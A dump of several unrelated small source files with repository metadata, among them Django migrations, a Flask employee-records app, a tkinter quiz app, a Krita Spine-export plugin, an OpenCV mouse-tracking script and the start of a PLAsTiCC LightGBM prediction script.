"LicenseRef-scancode-unknown-license-reference"
] | permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 175 | py | import tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['RelativeDifference'] , ['ConstantTrend'] , ['Seasonal_DayOfWeek'] , ['LSTM'] ); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
263bdb79183e6a8852db732e9fe310df072166bd | b2301365d220ff0295b8beddbed38b0581f9610d | /Django/fs_books_prj/apps/books/migrations/0001_initial.py | 1850bb0485a27325ab15bd0c528dafe99ff4abef | [] | no_license | JoA-MoS/Python | db246a5ff2201c6ef1dfb9d9b0fd8a37e1d7c46d | 4547c2667f3eaf0a001532bb2b103aab3c344fbe | refs/heads/master | 2021-08-16T11:18:20.420868 | 2017-07-21T05:52:18 | 2017-07-21T05:52:18 | 96,125,892 | 0 | 0 | null | 2021-06-10T18:40:09 | 2017-07-03T15:34:52 | Python | UTF-8 | Python | false | false | 676 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-19 19:21
from __future__ import unicode_literals
from django.db import migrations, models
# Auto-generated Django migration (avoid hand-editing the operations):
# creates the initial `Book` table with title/author/category columns.
class Migration(migrations.Migration):
    # First migration for this app; no prior state to depend on.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Book',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=255)),
                ('author', models.CharField(max_length=255)),
                ('category', models.CharField(max_length=100)),
            ],
        ),
    ]
| [
"justin.r.dietz@gmail.com"
] | justin.r.dietz@gmail.com |
92d3cc7dded89829e257acc53e820d4f8b3db58b | f8751f1301ac482f8dec55616cdc3f8f7507092d | /hihi/app_li/urls.py | fee99a9d44e99dfa47783a5ac983b71a3fd78de9 | [] | no_license | dragon-final-project/django-prac | 561ae97c2a8df388246039ee78e2f50e9a3b5963 | 8dcc37d61deefb9c668594cde34284308d89c34e | refs/heads/master | 2020-03-22T17:40:04.076909 | 2018-07-22T12:33:54 | 2018-07-22T12:33:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | from django.urls import path
from .views import secreat
urlpatterns = [
path('', secreat),
]
# URL/app/show/
| [
"apple@appledeMacBook-Air-2.local"
] | apple@appledeMacBook-Air-2.local |
f96585bae9d1f54ec1af98180b5f27849eba8e8e | c1eb1506ca2a3ab61795d0f9a5f399e7ac0b67fa | /Solve_For_X.py | a710c2163b8e16acf90e8e25ae282f95f671a139 | [] | no_license | studiou/Human-Factors---Proximity---Data-collection | e145c52a5995839bfc2fff2e525f27a82b5bee55 | 8b8a37eeba9c2f00efd49e4093de85cdd15ad6a2 | refs/heads/master | 2021-09-14T04:26:04.627412 | 2018-01-23T19:59:57 | 2018-01-23T19:59:57 | 114,662,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | __author__ = 'joel'
import math
def solveforx(y, angle):
    """Return the horizontal offset x for distance *y* at *angle* degrees.

    Computes ``x = y * tan(angle)``.  Non-positive angles are treated as
    "no offset" and yield 0, matching the data-collection convention.
    """
    if angle <= 0:
        return 0
    return y * math.tan(math.radians(angle))
"studiou.ge@gmail.com"
] | studiou.ge@gmail.com |
7045d25d019bca79616a47e6d947e80e72753e89 | 9a7c156365d5c80b989b93c4201958936876e245 | /Scientia/server.py | ba91de564bb84af4b25f246b1e529b3f087d35de | [] | no_license | vijay4004/Scientia | adc4189a72a2e766a3b7ca0129141222df1a5c84 | 3e4b519cdc8388349283d86325837c17e2c719fd | refs/heads/master | 2022-09-26T00:30:40.105045 | 2020-06-04T09:07:08 | 2020-06-04T09:07:08 | 269,308,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,405 | py | from flask import Flask, render_template, request, jsonify
from flask_restful import Resource, Api
from flask_mysqldb import MySQL
app = Flask(__name__)
api = Api(app)
# app.config['MYSQL_HOST'] = 'localhost'
# app.config['MYSQL_DATABASE_PORT'] = '3306'
# app.config['MYSQL_USER'] = 'root'
# app.config['MYSQL_PASSWORD'] = 'vijay4004'
# app.config['MYSQL_DB'] = 'employees'
# mysql = MySQL(app)
@app.route('/', methods=['GET', 'POST'])
def index():
    """Render the home page; on POST, insert the submitted employee row.

    NOTE(review): the MySQL configuration block and ``mysql = MySQL(app)``
    are commented out at module level, so ``mysql`` below is undefined and
    every POST raises NameError until that setup is restored.
    """
    if request.method == "POST":
        details = request.form
        name = details['name']
        designation = details['designation']
        address = details['address']
        phone = details['phone']
        print(name)
        # Parameterised INSERT (placeholders avoid SQL injection).
        cur = mysql.connection.cursor()
        cur.execute("INSERT INTO empdetails(name, designation, address, phone) VALUES (%s, %s, %s, %s)", (name, designation, address, phone))
        mysql.connection.commit()
        cur.close()
        return 'success'
    return render_template('home.html')
class Employee(Resource):
    """REST resource for employee records (registered at '/')."""
    def get(self):
        # Static placeholder payload; no database read yet.
        return {"employees":[1,2,3,4]}
    def post(self):
        # NOTE(review): `json` is never imported in this module, so this
        # handler raises NameError as soon as it runs; import json (or use
        # request.get_json()) before shipping.
        details = json.loads(request.form.get('payload'))
        name = details['name']
        designation = details['designation']
        address = details['address']
        phone = details['phone']
        # NOTE(review): the parsed fields are only printed; nothing is
        # persisted and no response value is returned.
        print(details)
api.add_resource(Employee, '/')
if __name__ == '__main__':
app.run(port='5002') | [
"vijayyadaviitism@gmail.com"
] | vijayyadaviitism@gmail.com |
683c8168877dd2b6b8a0c8527e1f7de813a4bdfd | 4c6e0771833c087876b91962ca0f7c2ef821daa4 | /numscrypt/random.py | 1eecb29cb5e905085a0f3250913c2166291b3135 | [
"Apache-2.0"
] | permissive | fangbei/Numscrypt | fb8a57d57ee1fad39ed9789f4e6241ae152ca563 | cf92b8b8edc57b08d24e8db482b5ea9ee8f494cd | refs/heads/master | 2021-01-17T05:18:43.257510 | 2016-03-30T10:27:13 | 2016-03-30T10:27:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | import numscrypt as ns
def rand (*dims):
    """Return an array of shape *dims* filled with uniform [0, 1) samples.

    NOTE: this module targets Transcrypt (Python-to-JavaScript);
    ``result.data.length`` and ``Math.random()`` are JavaScript constructs
    resolved in the browser at runtime and are not valid under CPython.
    """
    result = ns.empty (dims, 'float64')
    for i in range (result.data.length):
        result.data [i] = Math.random ()
    return result
| [
"info@qquick.org"
] | info@qquick.org |
92aece0e84d6fa231abb8862e3d9d091bd2e62d0 | 390e4715e3a3b4ce81213fd2508ba875b54281a8 | /linear regression.py | a6f66548b48898d94ad12cba877a492baffce1c9 | [] | no_license | km-mnk/machine-learning | 276685e7e10588b4e5cc367dc2447b29c05de5d0 | 9bff2fafacf71145a32f355af8012af58a28c906 | refs/heads/master | 2020-04-22T11:00:13.607535 | 2019-07-08T10:36:53 | 2019-07-08T10:36:53 | 170,324,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,044 | py | import pandas as pd
from sklearn.linear_model import LinearRegression
data=pd.read_csv('/home/cbit/Desktop/gpa.csv')
print(data.head())
X=data.iloc[:,:-1]
y=data.iloc[:,1]
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.2, random_state=0)
model = LinearRegression()
model.fit(X_train, y_train)
yy=model.predict(X_test)
print(yy)
#accuracy
error=0
ss=list(y_test)
j=0
for i in yy:
error=error+abs(i-ss[j])
j=j+1
print(error)
# =================================================================================================================================================
# Calculating error -- candidate metrics to report for the regression:
#   Mean Absolute Error
#   Mean Square Error
#   Mean Absolute Percentage Error
#   Mean Percentage Error
#   Mean Absolute (entry truncated in the original notes)
| [
"noreply@github.com"
] | noreply@github.com |
6d60724b38aff1eb7a74f5a40651d5aacb957795 | 76f987c964b64a4a5ab5b32e0b120d716ac51d50 | /examcopy.py | 3566062215f05741a596f13ddc349dec7bb4c856 | [] | no_license | Anurag-Srivastav/python-gui-test-application | 550bd98adc54210773b52bb497742cfc57aeef4b | 613438956e6488b66de9b89958613c15042a25e0 | refs/heads/master | 2022-04-14T07:50:30.992233 | 2020-04-08T21:09:43 | 2020-04-08T21:09:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,811 | py | from tkinter import *
import sqlite3
from tkinter import messagebox
conn=sqlite3.connect("db/questions.db")
c=conn.cursor()
##################VARIABLES########################
i=1
m=0
r=0
un=0
f=0
################################FUNCTIONS#####################################
def new():
    """Advance the exam to the next question.

    Increments the global question counter `i`, pulls the question text
    from the sqlite `easyques` table, shows the matching option set and
    rebuilds the response widgets.  The trailing `#N` comment on each
    option list records the correct answer's 1-based position.
    """
    box=0
    q2=["Integer","String","Float","Double"] #2
    q3=["z=z++","z=z+-","z=z+1","z=z**"] #1
    q4=["[1j,4,5]","[5,4,1j]","Type Error","[4,5,1j]"] #3
    q5=["Function","Cursor","Module","Class"] #4
    q6=["insert","append","Only 1","Both 1 and 2"] #1
    q7=["List","Tuple","Dictionary","Set"] #2
    q8=["12","16","64","18"] #2
    q9=["Canvas","Turtle","Tkinter","Graphics"] #2
    q10=["1","-2","2","-1"] #4
    global i
    i=i+1
    l.configure(text="Question Number "+str(i))
    # NOTE(review): prefer a parameterised query over string concatenation.
    b=c.execute("select quest from easyques where qid=" + str(i)).fetchall()
    p=str(b)
    # Strip the "[('" / "')]" wrapper from the fetched row's repr.
    ques.configure(text=p[2:(len(p) - 2):1])
    if(i==2):
        displayoptions(q2)
    if(i==3):
        displayoptions(q3)
    if(i==4):
        displayoptions(q4)
    if(i==5):
        displayoptions(q5)
    if(i==6):
        displayoptions(q6)
    if(i==7):
        displayoptions(q7)
    if(i==8):
        displayoptions(q8)
    if(i==9):
        displayoptions(q9)
    if(i==10):
        displayoptions(q10)
    if(i==11):
        # Past the last question: close the exam window, show results page.
        w.destroy()
        import endpage
    # NOTE(review): this loop recreates the same two widgets 15 times, and
    # `res` ends up bound to a brand-new EMPTY Entry, so `u` below is
    # always '' -- the user's typed answer is never read here.
    for box in range(0,15):
        ent=Label(ef, text="YOUR RESPONSE :",font=("Times New Roman",22,'bold'),bg="grey")
        ent.place(relx=0.05, rely=0.8)
        res=Entry(ef,bg="skyblue",font=("Times New Roman",20,'bold'),width=4,bd=5)
        res.place(relx=0.32, rely=0.8)
    u=res.get()
    check(u)
def check(u):
    """Score response `u`, updating globals m (marks), r (right),
    un (unanswered) and f (wrong).

    NOTE(review): several defects here --
      * only question 1 is ever scored (`i==1 and u=='2'`);
      * `i` is an int but the membership test uses the STRING list
        ['1','2','3','4'], so `i not in [...]` is always True and the
        elif branch runs for every i != 1;
      * the else branch is therefore unreachable, and `m=c-0.25` would
        subtract from the module-level sqlite cursor `c` anyway
        (presumably `m = m - 0.25` was intended).
    """
    global i
    global m
    global r
    global un
    global f
    if(i==1 and u=='2'):
        m=m+1
        r=r+1
    elif i not in ['1','2','3','4']:
        un=un+1
    else:
        m=c-0.25
        f=f+1
    print(m,r,un,f)
def endpage():
    # Close the exam window; importing the endpage module runs its
    # top-level UI code, which displays the results screen.
    w.destroy()
    import endpage
def displayoptions(option):
    """Render the four answer options vertically plus a "Next" button.

    NOTE(review): only the LAST Label stays bound to `B`, so the final
    `B.forget()` touches just that one widget -- and appears ineffective
    for widgets managed by place() anyway (confirm intent).
    """
    pp=0.35
    for k in range(0,len(option)):
        B=Label(text=option[k], bg="black",fg="white",font=("Times New Roman",22,'bold'),bd=5,width=12)
        B.place(relx=0.3,rely=pp)
        pp=pp+0.07
    b=Button(ef,text="Next",bg="black",fg="white",font=("Times New Roman",20,"bold"),width=10,bd=3,
             activebackground="grey",activeforeground="black",highlightcolor="grey",command=new)
    b.place(relx=0.75, rely=0.8)
    B.forget()
def calc(n):
    """Apparently intended to bump a counter when question 2's answer is 2.

    NOTE(review): broken/dead code -- `calc` appears unused in this file,
    and `c=c+1` makes `c` local and reads it before assignment
    (UnboundLocalError); at module level `c` is the sqlite cursor.
    """
    global i
    if(i==2 and n==2):
        c=c+1;
        print(c)
##################################window#################################################
w=Tk()
w.attributes("-fullscreen",True)
w.configure(bg="black")
#examframe
ef=Frame(bg="grey",height=w.winfo_screenheight()/1.8,width=w.winfo_screenwidth()/1.5)
ef.place(relx=0.23,rely=0.2)
a=str(c.execute("select quest from easyques where qid=1").fetchall())
ques=Label(ef,text=a[2:(len(a)-2):1],bg="grey",font=("Times New Roman",25,"bold"))
ques.place(relx=0.09,rely=0.1)
#numbering
bp=0.269
for y in range(1,5):
hi=Label(ef,text=(str(y)+")"),bg="black",fg="white",font=("Times New Roman",22,'bold'),bd=5,width=4)
hi.place(relx=0.05,rely=bp)
bp=bp+0.126
#options
q1=["James Gouslin","Guido Rossum","Dennis Retchie","Bane Strostrup"]
displayoptions(q1)
#sideframe
sf=Frame(bg="grey",height=w.winfo_screenheight()/1.8,width=w.winfo_screenwidth()/5)
sf.place(relx=0.01,rely=0.2)
#topframe
tf=Frame(bg="grey",height=w.winfo_screenheight()/9,width=w.winfo_screenwidth()/2)
tf.place(relx=0.23,rely=0.04)
l=Label(text="Question Number 1",bg="grey",font=("Arial Black",40))
l.place(relx=0.27,rely=0.05)
#canvas
z=Canvas(w,height=w.winfo_screenheight()/6,width=w.winfo_screenwidth()/10)
z.place(relx=0.0999,rely=0.01)
img=PhotoImage(file="new11.gif")
z.create_image(2,2 ,anchor=NW , image=img)
#taskbar
tb1=Frame(bg="grey",height=w.winfo_screenheight()/12,width=w.winfo_screenwidth()/1)
tb1.place(relx=0.0,rely=0.85)
end=Button(tb1,text="END",background="black",foreground="white",activebackground="black",font=("Times New Roman",20,'bold'),width=10,command=endpage)
end.place(relx=0.8,rely=0.1)
#response
#o=res.get()
#submit
ent=Label(ef, text="YOUR RESPONSE :",font=("Times New Roman", 22, 'bold'),bg="grey")
ent.place(relx=0.05, rely=0.8)
res=Entry(ef, bg="skyblue", font=("Times New Roman", 20, 'bold'), width=4, bd=5)
res.place(relx=0.32, rely=0.8)
u=res.get()
print(u)
S=Button(ef, text="SUBMIT", bg="black", fg="white", font=("Times New Roman", 20, "bold"), width=10, bd=3,activebackground="grey", activeforeground="black", highlightcolor="grey",command=new)
S.place(relx=0.56,rely=0.8)
w.mainloop() | [
"noreply@github.com"
] | noreply@github.com |
92fa8e75603a7fc0820ed907b0d952195f975939 | aeca07bdf3b6a335820c61348547a616a5962d16 | /store/migrations/0002_auto_20200807_1918.py | e60ac5b6b9ffcf48795780bc0adcfbf79383919e | [] | no_license | dhruv-shindhe/Fipple_V1 | 43b4308f759a838a31a1816bd8d93f0a3ab5b5e9 | 020f2f15f6526661c6b1853771a2bb0d1bbef8c6 | refs/heads/master | 2023-02-06T12:34:31.554238 | 2020-12-20T18:21:51 | 2020-12-20T18:21:51 | 323,093,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | # Generated by Django 3.1 on 2020-08-07 13:48
from django.db import migrations, models
# Auto-generated Django migration: switches Store.image to an ImageField
# stored under 'store/' with a default placeholder picture.
class Migration(migrations.Migration):
    dependencies = [
        ('store', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='store',
            name='image',
            field=models.ImageField(default='store/default_product.jpg', upload_to='store'),
        ),
    ]
| [
"dhruv.shindhe@gmail.com"
] | dhruv.shindhe@gmail.com |
f1acab3516a1d6e70fe5b6edf8b426d164c1607f | 4fc987d114245483e5bfffcec9f3202f673aac09 | /Programs/split.py | c6637b2f743ccce095db052059f5d2fa3c5053dc | [] | no_license | pvenkatesh786/Python | d041f730f78804edd1e6d87ab530bd915ea132dd | 563400a7a712f4481365a9d67e9bb38e47e88f37 | refs/heads/master | 2020-04-12T03:08:23.715916 | 2017-03-17T05:56:46 | 2017-03-17T05:56:46 | 60,979,728 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | #!/bin/python
str = raw_input("Please Enter :")
lst = str.split(',')
print lst
tpl = tuple(lst)
print tpl
| [
"padalavenkatesh786@gmail.com"
] | padalavenkatesh786@gmail.com |
05d1080f0efc343e6871e2ecd7d7aa499ab9b77b | 1b8118cf2744df4ee6f424123c95ec52d4329ff0 | /KritaToSpine/KritaToSpine.py | 8a01309873a46347353e36ea060d64baf5d5f032 | [] | no_license | DanMcLaughlin/krita-unofficial-spine-export | 149e5df9e80c14af819c49be4806c6c6e4dda285 | fe8c86fe0abe309f745bb370133f35439dfc0d59 | refs/heads/master | 2020-04-27T18:01:44.398096 | 2019-05-27T15:21:40 | 2019-05-27T15:21:40 | 174,550,590 | 15 | 5 | null | 2019-03-08T14:20:20 | 2019-03-08T14:20:20 | null | UTF-8 | Python | false | false | 1,260 | py | # Spine export
# Forked from Unofficial Spine Export (https://github.com/chartinger/krita-unofficial-spine-export)
# Based on the Esoteric Software Photoshop plugin, and the Spine Document Tools plugin
# uidocumentools.py contains the main window and logic, including tabs for applying effects on export
# SpineExport.py contains the code and support for doing the exporting
from krita import (Krita, Extension)
from . import uidocumenttools
class SpineExport(Extension):
    """Krita extension that adds a "Spine Export" menu action.

    Triggering the action opens the UIDocumentTools window
    (uidocumenttools.py), which hosts the export tabs; the export logic
    itself lives in SpineExport.py.
    """
    def __init__(self, parent):
        super().__init__(parent)
    def setup(self):
        # Nothing to initialise before the first window exists.
        pass
    def createActions(self, window):
        # Register the menu entry.  `i18n` is presumably injected by
        # Krita's PyKrita runtime (it is not imported here) -- confirm.
        action = window.createAction("spineexportAction",i18n("Spine Export"))
        action.setToolTip(i18n("Plugin to export to Spine."))
        action.triggered.connect(self.initialize)
        #action = window.createAction("spineexportAction", "Export to Spine", "tools/scripts")
        #action.triggered.connect(self.exportDocument)
    def initialize(self):
        # Open (and keep a reference to) the export dialog.
        self.uidocumenttools = uidocumenttools.UIDocumentTools()
        self.uidocumenttools.initialize()
# And add the extension to Krita's list of extensions:
Krita.instance().addExtension(SpineExport(Krita.instance()))
# End of file
| [
"dan.mclaughlin@gmail.com"
] | dan.mclaughlin@gmail.com |
d9053e4b81214feef41611784d616315dac60341 | d7f4e730935cedfc3b744a5806178388d8c9acde | /bad_code_from_hell/main.py | 3847eaf0f0029c8e83094ac2457befe563dcf08e | [] | no_license | SaraMederos/pystarters | 18eeddbb0a6ea26ac48c6ad1f346c5207a99c46a | fe29858b25d21d8ba8be5d82e198a5839a49494f | refs/heads/master | 2023-03-18T03:31:31.652607 | 2018-11-13T20:57:22 | 2018-11-13T20:57:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,670 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from skimage.exposure import rescale_intensity
def mk_background(vname, n=1000, from_frame=0):
    '''
    Creates a background image from the average of 'n' frames
    from video 'vname', starting at frame 'from_frame'.
    Returns a uint8 array of the same size as each frame in vname.
    '''
    # cv2 / cv / np are imported further down this module, but before
    # any call to this function is made.
    my_vid = cv2.VideoCapture(vname)
    my_vid.set(cv.CV_CAP_PROP_POS_FRAMES, from_frame)
    my_y, my_x = (int(my_vid.get(cv.CV_CAP_PROP_FRAME_HEIGHT)), int(my_vid.get(cv.CV_CAP_PROP_FRAME_WIDTH)))
    buf = np.empty( (my_y, my_x, n), dtype=np.uint8 )
    for i in range(n):
        # NOTE(review): read() failures are unchecked; a video shorter
        # than n frames would make cvtColor fail on a None frame.
        ret_val, img = my_vid.read()
        img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        buf[:,:,i]=img
    my_vid.release()
    return buf.mean(2).astype(np.uint8)
def playVid(video, vidName):
    """
    Play `video` in an OpenCV window titled `vidName`.
    Stops at end-of-stream or on any key press; note the window is only
    destroyed on the key-press path, not at normal end-of-stream.
    """
    cv.NamedWindow(vidName, 1)
    while True:
        ret_val, frame = video.read()
        if ret_val is False: break
        cv2.imshow(vidName, frame)
        if (cv2.waitKey(30) != -1):
            cv.DestroyWindow(vidName)
            break
def getMindur(duration):
    '''
    Format *duration* (in seconds) as a zero-padded "MM:SS" string.
    '''
    minutes, seconds = divmod(duration, 60.)
    return '{:02}:{:02}'.format(int(minutes), int(seconds))
## === Set variables === ##
videoFile = './videos/teleporter.h264' # The file to load
background = "00:11"
start = '00:27' # When we track from
end = "1:53" # When we track to
dataFile = 'data.tab' # File name for ouput
writeToFile = True # False | True
## === End set variables === ##
## Begin.
# Threshold to create binary image. For red videos ~15 seems to
# work fine; for brighter ones set it to ~50.
#threshold = 15
MHI_DURATION = 0.1 # I don't remember 0.1 what
import os, sys, time
import cv2
from cv2 import cv
import numpy as np
from matplotlib import pyplot as plt
from skimage.segmentation import clear_border
if videoFile[len(videoFile) - 5: len(videoFile)] == '.txt':
print "We dont' work with txt files"
sys.exit()
if videoFile[len(videoFile) - 5: len(videoFile)] == '.doc':
print "We dont' work with doc files"
sys.exit()
if videoFile[len(videoFile) - 5: len(videoFile)] == '.pdf':
print "We dont' work with doc files"
sys.exit()
if videoFile[len(videoFile) - 5: len(videoFile)] == '.jpg':
print "We dont' work with jpg files"
sys.exit()
if videoFile[len(videoFile) - 5: len(videoFile)] == '.tif': # TODO make work for tiff
print "We dont' work with jpg files"
sys.exit()
if videoFile[len(videoFile) - 5: len(videoFile)] == '.png': # TODO: add eps, ai, ps, csv
print "We dont' work with png files"
sys.exit()
video = cv2.VideoCapture(videoFile)
print "Program starting with video" + videoFile
## Define functions.
def timeStrToFrame(timeStr, f):
    '''
    timeStr     Time string in format mm:ss.
    f           Frames per second.

    Returns the frame number that corresponds to that time.
    '''
    # Split on the first ':' exactly as the original indexing did.
    colon = timeStr.find(':')
    minutes_part = timeStr[0:colon]
    seconds_part = timeStr[colon + 1:]
    total_seconds = int(seconds_part) + int(minutes_part) * 60
    return total_seconds * f
get_time = lambda: time.strftime('%Y.%m.%d %H:%M:%S')
## Initialise variables and arrays.
start = timeStrToFrame(start, int(video.get(cv.CV_CAP_PROP_FPS))); end = timeStrToFrame(end, int(video.get(cv.CV_CAP_PROP_FPS))); bgFrameNumber = timeStrToFrame(background, int(video.get(cv.CV_CAP_PROP_FPS)))
print "Tracking from "+str(start) + "to" + str(end) + ". Background is at ".format(background)
print "Number of background frames"+str(bgFrameNumber)
currentFrame = int(video.get(cv.CV_CAP_PROP_POS_FRAMES))
vidSize = (int(video.get(cv.CV_CAP_PROP_FRAME_HEIGHT)), int(video.get(cv.CV_CAP_PROP_FRAME_WIDTH)))
mhi = np.empty(vidSize, np.float32)
if writeToFile:
fout = open(dataFile, 'w')
fout.writelines('{}\t{}\t{}\n'.format(\
*['frameNum', 'centreX', 'centreY']))
## Read frames from video and detect motion.
# There seems to be a bug in opencv that prevents seeking for a
# specific frame in the video. Thus, we have to load each frame
# from the beginning and ignore the frames that are not needed.
while (currentFrame < end) == 1:
# Read frame.
ret, image = video.read()
# Quit if no frame was read or the user cancels operation.
if ((ret == 0) or (cv2.waitKey(1) != -1)):
video.release()
if writeToFile: fout.close()
break
currentFrame = int(video.get(cv.CV_CAP_PROP_POS_FRAMES))
# Upon reading the designated background frame, convert to gray
# display for reference.
if (currentFrame == bgFrameNumber):
bg = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
plt.imshow(bg, plt.cm.Greys_r)
plt.title("Background")
plt.axis('off')
plt.show(block=False)
# Ignore tracking if the current frame is not within the
# required range.
if (currentFrame < start):
continue
# Convert image to gray. Keep a colour copy for displaying.
ctr = image.copy()
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Subtract background from image.
imgsub = cv2.absdiff(image, bg)
# Threshold image.
ret, silh = cv2.threshold(imgsub, 15, \
255, cv2.THRESH_BINARY)
# Update motion history.
clear_border(silh)
cv2.updateMotionHistory(silh, mhi, time.clock(), MHI_DURATION)
# Find contours.
mhi_int = mhi.astype(np.uint8)
contours, hierarchy = cv2.findContours(mhi_int,\
mode=cv2.RETR_LIST,
method=cv2.CHAIN_APPROX_NONE)
if (len(contours) > 0):
cnt = contours[np.argmax([cv2.contourArea(c) for c in contours])] # Find index of largest contour, which should be the mouse.
# Fit an ellipse around the contour.
cv2.drawContours(ctr, [cnt], 0, (255, 255, 255), 2)
m = cv2.moments(cnt.astype(np.float32))
try:
c = [(m['m10'] / m['m00']), (m['m01'] / m['m00'])] # Πονάει όταν πρέπει να μεταφράσεις σχόλια.
except:
c = [-1, -1]
# Draw the ellipse in green on the frame for displaying
# progress.
# cv2.ellipse(ctr, ellipse, color=(0, 255, 0))
#cv2.drawContours(img_colour, cnt, -1, (0,255,0))
# Save ellipse params to text file.
if writeToFile:
fout.write('{}\t'.format(currentFrame))
fout.write('{}\t{}\t'.format(*c))
# Display progress.
cv2.imshow(videoFile[videoFile.rfind('/')+1:len(videoFile)-5], ctr)
| [
"c.rousseau@ucl.ac.uk"
] | c.rousseau@ucl.ac.uk |
a7176baef4d77bbf660c398d339c90296cd2f6b7 | f78713bf8922720e1100d3cf28731ed57d23489f | /Question_25.py | a612ca1b593787be481686213042df1413c8c6b2 | [] | no_license | Pranay2309/Test6_Corrections | 672b4c2a56550440e247eb4bfa1f8ebe61ed3d72 | 8915d53710080701a6ae9c146857c750a9af9c63 | refs/heads/master | 2022-12-09T04:40:27.432380 | 2020-09-16T06:36:13 | 2020-09-16T06:36:13 | 295,944,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47 | py | print('abcd'.translate({97:98,98:99,99:100}))
| [
"pranayyesekar2309@gmail.com"
] | pranayyesekar2309@gmail.com |
9346e299b29cdb9fc9e6cd49bfae383ada7dd18e | 957ab2916bb75edc78b9d7598b4f890b80687ea8 | /core_library/game/file_processing.py | 54792eabf69578013dbe142f86df137299ab7598 | [] | no_license | doug3230/Slayer | 9e91f5db01702c206c3d52460bfb880691d3eb6a | 1dd7e72779e060c397f1e68b829004e147e15f84 | refs/heads/master | 2016-09-06T03:32:53.914322 | 2014-11-01T07:27:12 | 2014-11-01T07:27:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,956 | py | '''
Created on Oct 25, 2014
@author: Richard
'''
import pygame, customization
from pygame.freetype import Font, SysFont
def path_to_file(dir_name, file_name):
    '''
    Join dir_name and file_name with a forward slash.
    Falls back to the bare file name when the directory is empty/None,
    so files configured without a directory resolve relative to CWD.
    '''
    if not dir_name:
        return file_name
    return "%s/%s" % (dir_name, file_name)
# Per-asset-type path helpers: each resolves a bare file name against the
# directory configured in customization.file_settings.
def path_to_image(file_name):
    return path_to_file(customization.file_settings.FILE_IMAGE_DIRECTORY, file_name)
def path_to_music(file_name):
    return path_to_file(customization.file_settings.FILE_MUSIC_DIRECTORY, file_name)
def path_to_level(file_name):
    return path_to_file(customization.file_settings.FILE_LEVEL_DIRECTORY, file_name)
def path_to_font(file_name):
    return path_to_file(customization.file_settings.FILE_FONT_DIRECTORY, file_name)
def load_music(file_name, path_included = False):
    '''
    Load a music track into pygame's mixer.  When path_included is False
    the name is resolved against the configured music directory.
    '''
    if not path_included:
        pygame.mixer.music.load(path_to_music(file_name))
    else:
        pygame.mixer.music.load(file_name)
    return
def play_music(loop = True):
    '''
    Start the loaded track; loop=True repeats it indefinitely (-1).
    '''
    if loop:
        pygame.mixer.music.play(-1)
    else:
        pygame.mixer.music.play()
    return
def stop_music():
    '''
    Stop whatever track the mixer is currently playing.
    '''
    pygame.mixer.music.stop()
    return
def load_image(file_name, path_included = False):
    '''
    Load an image, resolving against the image directory unless
    path_included is True.  convert() matches the display pixel format
    for faster blitting.
    '''
    if not path_included:
        image = pygame.image.load(path_to_image(file_name))
    else:
        image = pygame.image.load(file_name)
    return image.convert()
def resize_image(image, new_width, new_height):
    '''
    Return a copy of image scaled to (new_width, new_height) pixels.
    '''
    image = pygame.transform.scale(image, (int(new_width), int(new_height)))
    return image.convert()
def load_font(file_name, size, bold = False, italic = False, path_included = False):
    '''
    Load a freetype Font from file, resolving against the font directory
    unless path_included is True.
    '''
    if not path_included:
        font = Font(path_to_font(file_name), size, bold, italic)
    else:
        font = Font(file_name, size, bold, italic)
    return font
def load_system_font(file_name, size, bold = False, italic = False):
    '''
    Load a font installed on the system by name via SysFont.
    '''
    font = SysFont(file_name, size, bold, italic)
    return font
| [
"doug3230@mylaurier.ca"
] | doug3230@mylaurier.ca |
3bf1dfaa5339532ee42b32558cc1c9e8bb8157b2 | 9142f290c2ca89e53ced306804fece05043c3aa0 | /py/trash/bk0/908_predict_1026-1.py | fc46045263cfc0793b058c3a73dbecb9567b93fc | [
"MIT"
] | permissive | norihitoishida/PLAsTiCC-2018 | aea5ecff5c06c46e3097673228054726fb1cc972 | f7f3e86fd3b01145de6f96ebe9a7bdad49439956 | refs/heads/master | 2021-10-09T00:19:27.389096 | 2018-12-19T06:29:55 | 2018-12-19T06:29:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,969 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 26 15:46:49 2018
@author: kazuki.onodera
"""
import numpy as np
import pandas as pd
import os, gc
from glob import glob
from tqdm import tqdm
import sys
sys.path.append(f'/home/{os.environ.get("USER")}/PythonLibrary')
import lgbextension as ex
import lightgbm as lgb
from multiprocessing import cpu_count
import utils
utils.start(__file__)
#==============================================================================
SUBMIT_FILE_PATH = '../output/1026-1.csv.gz'
COMMENT = 'f001~011'
EXE_SUBMIT = True
DROP = ['f001_hostgal_specz']
SEED = np.random.randint(9999)
np.random.seed(SEED)
print('SEED:', SEED)
NFOLD = 5
LOOP = 5
